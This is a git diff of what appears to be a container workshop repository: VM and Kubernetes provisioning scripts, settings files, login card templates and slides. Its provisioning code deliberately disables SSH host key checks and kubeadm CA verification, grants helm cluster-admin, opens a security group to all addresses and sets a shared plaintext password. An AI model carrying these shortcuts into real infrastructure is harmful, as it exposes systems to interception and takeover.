@@ -2,7 +2,7 @@ export AWS_DEFAULT_OUTPUT=text
HELP=""
_cmd() {
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
}
_cmd help "Show available commands"
@@ -74,10 +74,10 @@ _cmd_deploy() {
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
pssh sudo chmod +x /usr/local/bin/docker-prompt
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
pssh "
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
sudo -u docker tar -C /home/docker -xf-"
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
@@ -86,11 +86,11 @@ _cmd_deploy() {
cat /home/docker/.ssh/id_rsa.pub |
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
# On the first node, create and deploy TLS certs using Docker Machine
# On node1, create and deploy TLS certs using Docker Machine
# (Currently disabled.)
true || pssh "
if i_am_first_node; then
grep '[0-9]\$' /etc/hosts |
if grep -q node1 /tmp/node; then
grep ' node' /etc/hosts |
xargs -n2 sudo -H -u docker \
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
fi"
@@ -103,62 +103,11 @@ _cmd_deploy() {
info "$0 cards $TAG"
}
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
_cmd_disabledocker() {
TAG=$1
need_tag
pssh "sudo systemctl disable docker.service"
pssh "sudo systemctl disable docker.socket"
pssh "sudo systemctl stop docker"
}
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
_cmd_kubebins() {
TAG=$1
need_tag
pssh --timeout 300 "
set -e
cd /usr/local/bin
if ! [ -x etcd ]; then
curl -L https://github.com/etcd-io/etcd/releases/download/v3.3.10/etcd-v3.3.10-linux-amd64.tar.gz \
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
fi
if ! [ -x hyperkube ]; then
curl -L https://dl.k8s.io/v1.14.1/kubernetes-server-linux-amd64.tar.gz \
| sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
fi
if ! [ -x kubelet ]; then
for BINARY in kubectl kube-apiserver kube-scheduler kube-controller-manager kubelet kube-proxy;
do
sudo ln -s hyperkube \$BINARY
done
fi
sudo mkdir -p /opt/cni/bin
cd /opt/cni/bin
if ! [ -x bridge ]; then
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.5/cni-plugins-amd64-v0.7.5.tgz \
| sudo tar -zx
fi
"
}
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
_cmd_kube() {
TAG=$1
need_tag
# Optional version, e.g. 1.13.5
KUBEVERSION=$2
if [ "$KUBEVERSION" ]; then
EXTRA_KUBELET="=$KUBEVERSION-00"
EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
else
EXTRA_KUBELET=""
EXTRA_KUBEADM=""
fi
# Install packages
pssh --timeout 200 "
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
@@ -167,19 +116,19 @@ _cmd_kube() {
sudo tee /etc/apt/sources.list.d/kubernetes.list"
pssh --timeout 200 "
sudo apt-get update -q &&
sudo apt-get install -qy kubelet$EXTRA_KUBELET kubeadm kubectl &&
sudo apt-get install -qy kubelet kubeadm kubectl &&
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
# Initialize kube master
pssh --timeout 200 "
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
kubeadm token generate > /tmp/token &&
sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
sudo kubeadm init --token \$(cat /tmp/token)
fi"
# Put kubeconfig in ubuntu's and docker's accounts
pssh "
if i_am_first_node; then
if grep -q node1 /tmp/node; then
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
@@ -189,23 +138,16 @@ _cmd_kube() {
# Install weave as the pod network
pssh "
if i_am_first_node; then
if grep -q node1 /tmp/node; then
kubever=\$(kubectl version | base64 | tr -d '\n') &&
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
fi"
# Join the other nodes to the cluster
pssh --timeout 200 "
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
fi"
# Install metrics server
pssh "
if i_am_first_node; then
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token) &&
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
fi"
# Install kubectx and kubens
@@ -241,21 +183,6 @@ EOF"
helm completion bash | sudo tee /etc/bash_completion.d/helm
fi"
# Install ship
pssh "
if [ ! -x /usr/local/bin/ship ]; then
curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
sudo tar -C /usr/local/bin -zx ship
fi"
# Install the AWS IAM authenticator
pssh "
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
##VERSION##
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
sudo chmod +x /usr/local/bin/aws-iam-authenticator
fi"
sep "Done"
}
@@ -276,9 +203,10 @@ _cmd_kubetest() {
# Feel free to make that better ♥
pssh "
set -e
if i_am_first_node; then
[ -f /tmp/node ]
if grep -q node1 /tmp/node; then
which kubectl
for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
done
fi"
@@ -349,14 +277,6 @@ _cmd_opensg() {
infra_opensg
}
_cmd disableaddrchecks "Disable source/destination IP address checks"
_cmd_disableaddrchecks() {
TAG=$1
need_tag
infra_disableaddrchecks
}
_cmd pssh "Run an arbitrary command on all nodes"
_cmd_pssh() {
TAG=$1
@@ -391,15 +311,6 @@ _cmd_retag() {
aws_tag_instances $OLDTAG $NEWTAG
}
_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
TAG=$1
need_tag
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP"
ssh docker@$IP
}
_cmd start "Start a group of VMs"
_cmd_start() {
while [ ! -z "$*" ]; do
@@ -411,7 +322,7 @@ _cmd_start() {
*) die "Unrecognized parameter: $1."
esac
done
if [ -z "$INFRA" ]; then
die "Please add --infra flag to specify which infrastructure file to use."
fi
@@ -422,8 +333,8 @@ _cmd_start() {
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
warning "No --count option was specified. Using value from settings file ($COUNT)."
fi
# Check that the specified settings and infrastructure are valid.
# Check that the specified settings and infrastructure are valid.
need_settings $SETTINGS
need_infra $INFRA
@@ -495,15 +406,15 @@ _cmd_helmprom() {
TAG=$1
need_tag
pssh "
if i_am_first_node; then
if grep -q node1 /tmp/node; then
kubectl -n kube-system get serviceaccount helm ||
kubectl -n kube-system create serviceaccount helm
sudo -u docker -H helm init --service-account helm
helm init --service-account helm
kubectl get clusterrolebinding helm-can-do-everything ||
kubectl create clusterrolebinding helm-can-do-everything \
--clusterrole=cluster-admin \
--serviceaccount=kube-system:helm
sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
helm upgrade --install prometheus stable/prometheus \
--namespace kube-system \
--set server.service.type=NodePort \
--set server.service.nodePort=30090 \
@@ -585,8 +496,8 @@ test_vm() {
for cmd in "hostname" \
"whoami" \
"hostname -i" \
"ls -l /usr/local/bin/i_am_first_node" \
"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
"cat /tmp/node" \
"cat /tmp/ipv4" \
"cat /etc/hosts" \
"hostnamectl status" \
"docker version | grep Version -B1" \

View File

@@ -24,7 +24,3 @@ infra_quotas() {
infra_opensg() {
warning "infra_opensg is unsupported on $INFRACLASS."
}
infra_disableaddrchecks() {
warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
}

View File

@@ -88,14 +88,6 @@ infra_opensg() {
--cidr 0.0.0.0/0
}
infra_disableaddrchecks() {
IDS=$(aws_get_instance_ids_by_tag $TAG)
for ID in $IDS; do
info "Disabling source/destination IP checks on: $ID"
aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
done
}
wait_until_tag_is_running() {
max_retry=50
i=0

View File

@@ -12,7 +12,6 @@ config = yaml.load(open("/tmp/settings.yaml"))
COMPOSE_VERSION = config["compose_version"]
MACHINE_VERSION = config["machine_version"]
CLUSTER_SIZE = config["clustersize"]
CLUSTER_PREFIX = config["clusterprefix"]
ENGINE_VERSION = config["engine_version"]
DOCKER_USER_PASSWORD = config["docker_user_password"]
@@ -122,7 +121,7 @@ addresses = list(l.strip() for l in sys.stdin)
assert ipv4 in addresses
def makenames(addrs):
return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]
return [ "node%s"%(i+1) for i in range(len(addrs)) ]
while addresses:
cluster = addresses[:CLUSTER_SIZE]
@@ -136,21 +135,15 @@ while addresses:
print(cluster)
mynode = cluster.index(ipv4) + 1
system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
system("echo node{} | sudo tee /etc/hostname".format(mynode))
system("sudo hostname node{}".format(mynode))
system("sudo -u docker mkdir -p /home/docker/.ssh")
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")
# Create a convenience file to easily check if we're the first node
if ipv4 == cluster[0]:
system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
# On the first node, if we don't have a private key, generate one (with empty passphrase)
# If I'm node1 and don't have a private key, generate one (with empty passphrase)
system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
else:
system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
# Record the IPV4 and name of the first node
system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))
FINISH = time.time()
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])

View File

@@ -1,8 +1,5 @@
# Number of VMs per cluster
clustersize: 5
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: clusters.csv

View File

@@ -0,0 +1,25 @@
# Number of VMs per cluster
clustersize: 5
# Jinja2 template to use to generate ready-to-cut cards
cards_template: enix.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.22.0
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -0,0 +1,27 @@
# customize your cluster size, your cards template, and the versions
# Number of VMs per cluster
clustersize: 5
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: test
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.18.0
machine_version: 0.13.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -3,11 +3,8 @@
# Number of VMs per cluster
clustersize: 1
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: jerome.html
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter

View File

@@ -1,9 +1,6 @@
# Number of VMs per cluster
clustersize: 4
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: jerome.html
@@ -26,4 +23,3 @@ machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -0,0 +1,27 @@
# 3 nodes for k8s 101 workshops
# Number of VMs per cluster
clustersize: 3
# Jinja2 template to use to generate ready-to-cut cards
cards_template: kube101.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.21.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -0,0 +1,27 @@
# This file is passed by trainer-cli to scripts/ips-txt-to-html.py
# Number of VMs per cluster
clustersize: 3
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.22.0
machine_version: 0.15.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,53 +0,0 @@
#!/bin/sh
set -e
INFRA=infra/aws-eu-west-3
STUDENTS=2
TAG=admin-dmuc
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$TAG.yaml \
--count $STUDENTS
./workshopctl deploy $TAG
./workshopctl disabledocker $TAG
./workshopctl kubebins $TAG
./workshopctl cards $TAG
TAG=admin-kubenet
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$TAG.yaml \
--count $((3*$STUDENTS))
./workshopctl deploy $TAG
./workshopctl kubebins $TAG
./workshopctl disableaddrchecks $TAG
./workshopctl cards $TAG
TAG=admin-kuberouter
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$TAG.yaml \
--count $((3*$STUDENTS))
./workshopctl deploy $TAG
./workshopctl kubebins $TAG
./workshopctl disableaddrchecks $TAG
./workshopctl cards $TAG
TAG=admin-test
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$TAG.yaml \
--count $((3*$STUDENTS))
./workshopctl deploy $TAG
./workshopctl kube $TAG 1.13.5
./workshopctl cards $TAG

View File

@@ -0,0 +1,106 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "orchestration workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_swarm -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.4em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

@@ -0,0 +1,117 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://septembre2018.container.training" -%}
{%- set pagesize = 9 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 30%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.3em;
}
img.enix {
height: 4.5em;
margin-top: 0.2em;
}
img.kube {
height: 4.2em;
margin-top: 1.7em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Voici les informations permettant de se connecter à votre
cluster pour cette formation. Vous pouvez vous connecter
à ces machines virtuelles avec n'importe quel client SSH.
</p>
<p>
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
<table>
<tr><td>identifiant:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>mot de passe:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
Vos serveurs sont :
<img class="kube" src="{{ image_src }}" />
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>Le support de formation est à l'adresse suivante :
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

@@ -1,14 +1,15 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://wwrk-2019-05.container.training/" -%}
{%- set url = "http://qconsf2018.container.training/" -%}
{%- set pagesize = 9 -%}
{%- set workshop_name = "training session" -%}
{%- if clustersize == 1 -%}
{%- set cluster_or_machine = "Docker machine" -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set cluster_or_machine = "Kubernetes cluster" -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
@@ -108,6 +109,23 @@ img {
<center>{{ url }}</center>
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% for x in range(pagesize) %}
<div class="back">
<br/>
<p>You got this card at the workshop "Getting Started With Kubernetes and Container Orchestration"
during QCON San Francisco (November 2018).</p>
<p>That workshop was a 1-day version of a longer curriculum.</p>
<p>If you liked that workshop, the instructor (Jérôme Petazzoni) can deliver it
(or the longer version) to your team or organization.</p>
<p>You can reach him at:</p>
<p>jerome.petazzoni@gmail.com</p>
<p>Thank you!</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endfor %}
</body>
</html>

View File

@@ -0,0 +1,106 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.4em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

@@ -1,7 +0,0 @@
FROM alpine
RUN apk update
RUN apk add entr
RUN apk add py-pip
RUN apk add git
COPY requirements.txt .
RUN pip install -r requirements.txt

View File

@@ -34,14 +34,6 @@ compile each `foo.yml` file into `foo.yml.html`.
You can also run `./build.sh forever`: it will monitor the current
directory and rebuild slides automatically when files are modified.
If you have problems running `./build.sh` (because of
Python dependencies or whatever),
you can also run `docker-compose up` in this directory.
It will start the `./build.sh forever` script in a container.
It will also start a web server exposing the slides
(but the slides should also work if you load them from your
local filesystem).
## Publishing pipeline
@@ -61,4 +53,4 @@ You can run `./slidechecker foo.yml.html` to check for
missing images and show the number of slides in that deck.
It requires `phantomjs` to be installed. It takes some
time to run so it is not yet integrated with the publishing
pipeline.
pipeline.

View File

@@ -1,5 +1 @@
# Uncomment and/or edit one of the following lines if necessary.
#/ /kube-halfday.yml.html 200
#/ /kube-fullday.yml.html 200
#/ /kube-twodays.yml.html 200
/ /wwrk.yml.html 200!
/ /kube-twodays.yml.html 200!

View File

@@ -186,48 +186,22 @@ Different deployments will use different underlying technologies.
---
## Some popular service meshes
## Section summary
... And related projects:
We've learned how to:
* [Consul Connect](https://www.consul.io/docs/connect/index.html)
<br/>
Transparently secures service-to-service connections with mTLS.
* Understand the ambassador pattern and what it is used for (service portability).
* [Gloo](https://gloo.solo.io/)
<br/>
API gateway that can interconnect applications on VMs, containers, and serverless.
For more information about the ambassador pattern, including demos on Swarm and ECS:
* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
Some services meshes and related projects:
* [Istio](https://istio.io/)
<br/>
A popular service mesh.
* [Linkerd](https://linkerd.io/)
<br/>
Another popular service mesh.
---
## Learning more about service meshes
A few blog posts about service meshes:
* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
<br/>
Provides historical context: how did we do before service meshes were invented?
* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
<br/>
Explains the purpose of service meshes. Illustrates some NGINX features.
* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
<br/>
Includes high-level overview and definitions.
* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
<br/>
Includes a step-by-step demo of Linkerd.
And a video:
* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
* [Gloo](https://gloo.solo.io/)

View File

@@ -131,12 +131,6 @@ Sending build context to Docker daemon 2.048 kB
* Be careful (or patient) if that directory is big and your link is slow.
* You can speed up the process with a [`.dockerignore`](https://docs.docker.com/engine/reference/builder/#dockerignore-file) file
* It tells docker to ignore specific files in the directory
* Only ignore files that you won't need in the build context!
---
## Executing each step

View File

@@ -528,9 +528,7 @@ Very short instructions:
- `docker network create mynet --driver overlay`
- `docker service create --network mynet myimage`
If you want to learn more about Swarm mode, you can check
[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
or [these slides](https://container.training/swarm-selfpaced.yml.html).
See http://jpetazzo.github.io/container.training for all the deets about clustering!
---

View File

@@ -1,5 +0,0 @@
# Exercise — writing a Compose file
Let's write a Compose file for the wordsmith app!
The code is at: https://github.com/jpetazzo/wordsmith

View File

@@ -1,9 +0,0 @@
# Exercise — writing better Dockerfiles
Let's update our Dockerfiles to leverage multi-stage builds!
The code is at: https://github.com/jpetazzo/wordsmith
Use a different tag for these images, so that we can compare their sizes.
What's the size difference between single-stage and multi-stage builds?

View File

@@ -1,5 +0,0 @@
# Exercise — writing Dockerfiles
Let's write Dockerfiles for an existing application!
The code is at: https://github.com/jpetazzo/wordsmith

View File

@@ -203,90 +203,4 @@ bash: figlet: command not found
* The basic Ubuntu image was used, and `figlet` is not here.
---
## Where's my container?
* Can we reuse that container that we took time to customize?
*We can, but that's not the default workflow with Docker.*
* What's the default workflow, then?
*Always start with a fresh container.*
<br/>
*If we need something installed in our container, build a custom image.*
* That seems complicated!
*We'll see that it's actually pretty easy!*
* And what's the point?
*This puts a strong emphasis on automation and repeatability. Let's see why ...*
---
## Pets vs. Cattle
* In the "pets vs. cattle" metaphor, there are two kinds of servers.
* Pets:
* have distinctive names and unique configurations
* when they have an outage, we do everything we can to fix them
* Cattle:
* have generic names (e.g. with numbers) and generic configuration
* configuration is enforced by configuration management, golden images ...
* when they have an outage, we can replace them immediately with a new server
* What's the connection with Docker and containers?
---
## Local development environments
* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
* create VM from base template (Ubuntu, CentOS...)
* install packages, set up environment
* work on project
* when done, shutdown VM
* next time we need to work on project, restart VM as we left it
* if we need to tweak the environment, we do it live
* Over time, the VM configuration evolves, diverges.
* We don't have a clean, reliable, deterministic way to provision that environment.
---
## Local development with Docker
* With Docker, the workflow looks like this:
